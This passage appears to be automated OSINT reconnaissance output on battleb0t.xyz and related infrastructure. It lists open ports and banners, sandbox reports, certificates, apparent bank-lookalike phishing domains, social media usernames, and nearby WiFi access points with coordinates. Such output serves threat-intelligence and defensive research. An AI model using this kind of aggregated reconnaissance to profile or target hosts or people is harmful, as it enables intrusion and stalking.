"SUIDmicrosoft.com/921617645178883103212286350027031032005SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743SRCHUSRDOB=20220131mic"\n Pattern match: "921618970071043111047686818777031032005MUID0F048E052A046F1F1B669D082B486E59msn.com/102518970071043111047686834402031032005"\n Pattern match: "MUIDB0BE6741FADBB6D6830696712ACF76C91ieonline.microsoft.com/921618970071 | 185.199.108.153 |
| 2023-05-12 03:19:47 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Twitter (Category: social)
https://twitter.com/patrickpogoda | patrickpogoda |
| 2023-05-12 02:54:19 | Linked URL - Internal | No | Web Spider | 4 | 0 | 3 | 0 | None | https://fluid.battleb0t.xyz/dat.gui.min.js | https://fluid.battleb0t.xyz/ |
| 2023-05-12 03:01:27 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.2): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:38 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5b5dccec8f8690-ORD
Content-Encoding: gzip
| 172.67.168.252 |
| 2023-05-12 02:46:43 | Malicious IP Address | Yes | MetaDefender | 0 | 1 | 3 | 0 | None | webroot.com [34.74.170.74] | 34.74.170.74 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ATTqYgQBna (Net ID: 18:9C:27:26:52:F0) | 37.751, -97.822 |
| 2023-05-12 03:16:28 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 3 | 0 | None | {u'region_code': u'HE', u'country_tld': u'.de', u'ip': u'165.232.113.85', u'currency_name': u'Euro', u'currency': u'EUR', u'country_population': 82927922, u'country_code': u'DE', u'timezone': u'Europe/Berlin', u'city': u'Frankfurt am Main', u'network': u'165.232.112.0/20', u'languages': u'de', u'version': u'IPv4', u'latitude': 50.113381, u'in_eu': True, u'utc_offset': u'+0200', u'continent_code': u'EU', u'country_name': u'Germany', u'country_capital': u'Berlin', u'org': u'DIGITALOCEAN-ASN', u'postal': u'60311', u'asn': u'AS14061', u'country': u'DE', u'region': u'Hesse', u'longitude': 8.671931, u'country_calling_code': u'+49', u'country_area': 357021.0, u'country_code_iso3': u'DEU'} | 165.232.113.85 |
| 2023-05-12 03:21:08 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Twitter (Category: social)
https://twitter.com/dawidsulej | dawidsulej |
| 2023-05-12 02:50:19 | Physical Location | No | ipstack | 0 | 0 | 3 | 0 | None | United States | 64.226.81.43 |
| 2023-05-12 02:44:28 | IP Address | No | DNS Resolver | 75 | 0 | 2 | 0 | None | 104.196.30.220 | pics.battleb0t.xyz |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | MatrixEx Guest (Net ID: 00:01:21:26:54:20) | 41.8781, -87.6298 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Steam (Category: gaming)
https://steamcommunity.com/id/login | login |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | imgur (Category: images)
https://imgur.com/user/ayhu/about | ayhu |
| 2023-05-12 03:03:31 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 006blog.github.io |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Newport (Net ID: 00:18:E7:CB:EB:02) | 32.8608, -79.9746 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Pauwels (Net ID: 00:03:6D:F4:D7:4E) | 50.8897, 6.0563 |
| 2023-05-12 02:55:05 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.97.1:8880 | 188.114.97.1 |
| 2023-05-12 03:24:19 | Account on External Site | No | Account Finder | 0 | 0 | 8 | 0 | None | Pinterest (Category: social)
https://www.pinterest.com/baptistevauthey/ | baptistevauthey |
| 2023-05-12 03:00:29 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | umac-128@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T07:25:44.787Z", "ip": "46.101.229.70", "labels": ["remote-access"], "location_updated_at": "2023-05-01T12:20:02.406356Z", "autonomous_system_updated_at": "2023-05-01T12:20:02.407454Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"www3citi5ensbnk01.nerdpol.ovh": {"record_type": "A", "resolved_at": "2023-05-08T21:52:09.615214562Z"}, "www3citizensbnk01.ddns.net": {"record_type": "A", "resolved_at": "2023-04-03T07:30:40.764584949Z"}, "www3citlzensbnk.ddns.net": {"record_type": "A", "resolved_at": "2023-04-23T19:19:28.631638390Z"}, "chainsyncpages.ddns.net": {"record_type": "A", "resolved_at": "2023-04-05T19:58:37.967204478Z"}, "mail.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-05-03T14:09:55.384272288Z"}, "jnbt05.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-10T17:13:22.939829997Z"}, "intelligent-euclid.46-101-229-70.plesk.page": {"record_type": "A", "resolved_at": "2023-04-28T22:08:15.278436745Z"}, "www.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.707553225Z"}, "46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.520320906Z"}}, "names": ["chainsyncpages.ddns.net", "www3citi5ensbnk01.nerdpol.ovh", "www3citizensbnk01.ddns.net", "www3citlzensbnk.ddns.net", "www.46-101-229-70.cprapid.com", "46-101-229-70.cprapid.com", "intelligent-euclid.46-101-229-70.plesk.page", "jnbt05.easypanel.host", 
"mail.46-101-229-70.cprapid.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T07:25:44.640117776Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "28960,64,true,MSTNW,1460,false,false", "os": "Ubuntu / Debian / CentOS", "id": 72}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "654b926728b59e31856ca456546380aae9ad6f0105be964db40d456c35d8474b", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "b/8s4eFX87LHgM34ZW3g9GyhRKNQyQUUsPt17LQ/ZJc=", "x": "OF+EuiYliuprX40ENBhAbc+GOunuKTpVTjg/1oXm5JM=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], 
"server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", 
"vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}], "autonomous_system": {"bgp_prefix": "46.101.128.0/17", "country_code": "US", "asn": 14061, "name": "DIGITALOCEAN-ASN", "description": "DIGITALOCEAN-ASN"}} |
| 2023-05-12 03:03:25 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 000000jihyun.github.io |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | permissions-policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fiT%2Fr8CwWrAQPZkt8VpkeQoVoGOR6HuHPRasaTPIcW93tfGJar9pTikOfGdSWQA5SZHUpCyuk56gghqLlY9yU5dVDbV5Bs9yRYYuQ0D9hZe3tyWEFUstq9XRCg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c594cb34339-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | YouTube User2 (Category: video)
https://www.youtube.com/@ayhu | ayhu |
| 2023-05-12 02:44:20 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | githubusercontent.com | 185.199.110.153 |
| 2023-05-12 02:56:44 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | (raw Hybrid Analysis sandbox report omitted) | 35.229.48.116 |
| 2023-05-12 03:08:52 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.126 | 34.148.97.127 |
| 2023-05-12 03:28:06 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.144:8443 | 188.114.96.0/24 |
| 2023-05-12 02:55:27 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | (raw Hybrid Analysis sandbox report omitted) | 185.199.109.153 |
| 2023-05-12 03:00:28 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | curve25519-sha256@libssh.org | (raw Censys host record omitted) |
| 2023-05-12 02:58:53 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 60, u'compromised_hosts': [u'23.227.38.74', u'104.17.25.14', u'104.16.254.71', u'157.240.19.26', u'104.21.88.99', u'34.74.170.74'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://www.ibisci.com/products/mini-total-rna-kit-blood-cultured-cells?_pos=2&_sid=742ced516&_ss=r&variant=31245650362479&variation=A&utm_campaign=9.14.22%20-%20Total%20RNA%20Blood%20%26%20Cultured%20Cell%20Kits%20%282022-09-14%29&utm_medium=email&utm_source=Biochemistry&_kx=ycAqKZ4PKkvzKzy8p0mk27UtqA5M4LAxjJAh8oW3IJAp2mwP8UbyPKq5lDAQ3sHn.MenwDE', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"r3.o.lencr.org"\n "ocsp.pki.goog"\n "o.ss2.us"\n "ocsp.rootg2.amazontrust.com"\n "ocsp.rootca1.amazontrust.com"\n "ocsp.sca1b.amazontrust.com"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\InternetShortcutMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_fd0_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_4048"\n "IsoScope_fd0_IESQMMUTEX_0_519"\n "IsoScope_fd0_ConnHashTable<4048>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_fd0_IESQMMUTEX_0_331"\n 
"Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_fd0_IE_EarlyTabStart_0x3f8_Mutex"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_4048"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "ico-select_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"23.227.38.74:443"\n "23.32.45.191:80"\n "104.17.25.14:443"\n "104.16.254.71:443"\n "142.250.217.74:443"\n "142.251.215.234:443"\n "157.240.19.26:443"\n "104.21.88.99:443"\n "18.65.229.84:443"\n "142.250.217.67:80"\n "108.138.90.53:80"\n "18.65.227.165:80"\n "18.65.227.47:80"\n "34.74.170.74:443"\n "142.250.217.67:443"\n "142.251.211.238:443"\n "162.159.138.60:443"\n "157.240.19.35:443"\n "172.253.117.156:443"\n "104.22.79.226:443"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': 
u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "ico-select_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "timber_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27]- [targetUID: 00000000-00003388]\n "modernizr.min_1_.js" has type "HTML document ASCII text with very long lines"- [targetUID: N/A]\n "21F6638F3EFF36EB5B125F1A8AEF3217" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\21F6638F3EFF36EB5B125F1A8AEF3217]- [targetUID: 00000000-00003388]\n "7cH1v4okm5zmbvwkAx_sfcEuiD8jvvKsOdC5_1_.woff" has type "Web Open Font Format TrueType length 18780 version 1.1"- [targetUID: N/A]\n "NBF07080.txt" has type "ASCII text with very long lines"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NBF07080.txt]- [targetUID: 00000000-00003388]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00004048]\n "spr-07102fd76ff4bc22a3e0c32f0cca9ee51c77c34bbc4bdac79abb48f698de10dd_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003388]\n "7cH1v4okm5zmbvwkAx_sfcEuiD8jvvKcPQ_1_.woff" has type "Web Open Font Format TrueType length 49556 version 1.1"- [targetUID: N/A]\n "CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA" has type "data"- Location: 
[%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA]- [targetUID: 00000000-00003388]\n "~DF9A0554BA9241DFC8.TMP" has type "data"- Location: [%TEMP%\\~DF9A0554BA9241DFC8.TMP]- [targetUID: 00000000-00004048]\n "1FEA9A2CFE77A3A9A620E9B3ED01E1C8" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\1FEA9A2CFE77A3A9A620E9B3ED01E1C8]- [targetUID: 00000000-00003388]\n "A16C6C16D94F76E0808C087DFC657D99_298E60D5E528EEA70E86195832615F2E" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\A16C6C16D94F76E0808C087DFC657D99_298E60D5E528EEA70E86195832615F2E]- [targetUID: 00000000-00003388]\n "7cH3v4okm5zmbtYtMeA0FKq0Jjg2drF0feC9hpk_1_.woff" has type "Web Open Font Format TrueType length 19932 version 1.1"- [targetUID: N/A]\n "trekkie.storefront.4e66b7932daba00cfd93bde327ce9e8f09bc9ffe.min_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "E87CE99F124623F95572A696C80EFCAF_8C73F4A8942021ADC4B0579C4C29CD27" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\E87CE99F124623F95572A696C80EFCAF_8C73F4A8942021ADC4B0579C4C29CD27]- [targetUID: 00000000-00003388]\n "Information~Payment~ShopPay.baseline.en.5e80b1ca4b17da5ffb95_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"cdn.shopify.com" seems to be random\n "cdnjs.cloudflare.com" seems to be random'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, 
u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://www.ibisci.com/products/mini-total-rna-kit-blood-cultured-cells?_pos=2&_sid=742ced516&_ss=r&variant=31245650362479&variation=A&utm_campaign=9.14.22%20-%20Total%20RNA%20Blood%20%26%20Cultured%20Cell%20Kits%20%282022-09-14%29&utm_medium=email&utm_sou"\n Pattern match: "https://www.ibisci.com"\n Heuristic match: "r3.o.lencr.org"\n Heuristic match: "GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBRI2smg%2ByvTLU%2Fw3mjS9We3NfmzxAQUFC6zF7dYVsuuUAlA5h%2BvnYsUwsYCEgT9t4TzNcNcoWRW2KRZ8hv3DA%3D%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: r3.o.lencr.org"\n Heuristic match: "GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBRI2smg%2ByvTLU%2Fw3mjS9We3NfmzxAQUFC6zF7dYVsuuUAlA5h%2BvnYsUwsYCEgPlgzh11zofO%2FUOCp2RAH1FpA%3D%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: r3.o.lencr.org"\n Heuristic match: "o.ss2.us"\n Heuristic match: "GET //MEowSDBGMEQwQjAJBgUrDgMCGgUABBSLwZ6EW5gdYc9UaSEaaLjjETNtkAQUv1%2B30c7dH4b0W1Ws3NcQwg6piOcCCQCnDkpMNIK3fw%3D%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: o.ss2.us"\n Heuristic match: "ocsp.rootg2.amazontrust.com"\n Heuristic match: "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBSIfaREXmfqfJR3TkMYnD7O5MhzEgQUnF8A36oB1zArOIiiuG1KnPIRkYMCEwZ%2FlEoqJ83z%2BsKuKwH5CO65xMY%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.rootg2.amazontrust.com"\n Heuristic match: "ocsp.rootca1.amazontrust.com"\n Heuristic match: "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPWaOUU8%2B5VZ5%2Fa9jFTaU9pkK3FAQUhBjMhTTsvAyUlC4IWZzHshBOCggCEwZ%2FlFeFh%2Bisd96yUzJbvJmLVg0%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.rootca1.amazontrust.com"\n Heuristic match: "GET 
/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRI2smg%2ByvTLU%2Fw3mjS9We3NfmzxAQUFC6zF7dYVsuuUAlA5h%2BvnYsUwsYCEgTzV04hPbSHRFbwbEGHB2U3Dw%3D%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: r3.o.lencr.org"\n Heuristic match: "ocsp.sca1b.amazontrust.com"\n Heuristic match: "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQz9arGHWbnBV0DFzpNHz4YcTiFDQQUWaRmBlKge5WSPKOUByeWdFv5PdACEApQTAHYfewVihAe3nxBvVw%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.sca1b.amazontrust.com"\n | 34.74.170.74 |
| 2023-05-12 03:03:18 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:10:b4:30:a3:e0:72:2f:ec:4e:bc:95:e3:12:bb:83:8d:6f
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, O=Let's Encrypt, CN=E1
Validity
Not Before: Dec 14 04:12:32 2022 GMT
Not After : Mar 14 04:12:31 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
FF:9F:0E:73:7B:4F:1D:9B:10:7F:DE:3A:BF:95:29:99:72:64:39:CE
X509v3 Authority Key Identifier:
keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC
Authority Information Access:
OCSP - URI:http://e1.o.lencr.org
CA Issuers - URI:http://e1.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: ecdsa-with-SHA384
|
| 2023-05-12 03:33:37 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | (binary string dump omitted) | https://pics.battleb0t.xyz/images/carti_2.PNG |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ZyXEL-aslan (Net ID: 00:02:CF:83:7F:15) | 40.2024, 29.0398 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:BB:17:A7) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:18:26 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | GitHub (Category: coding)
https://github.com/Altpapier | Altpapier |
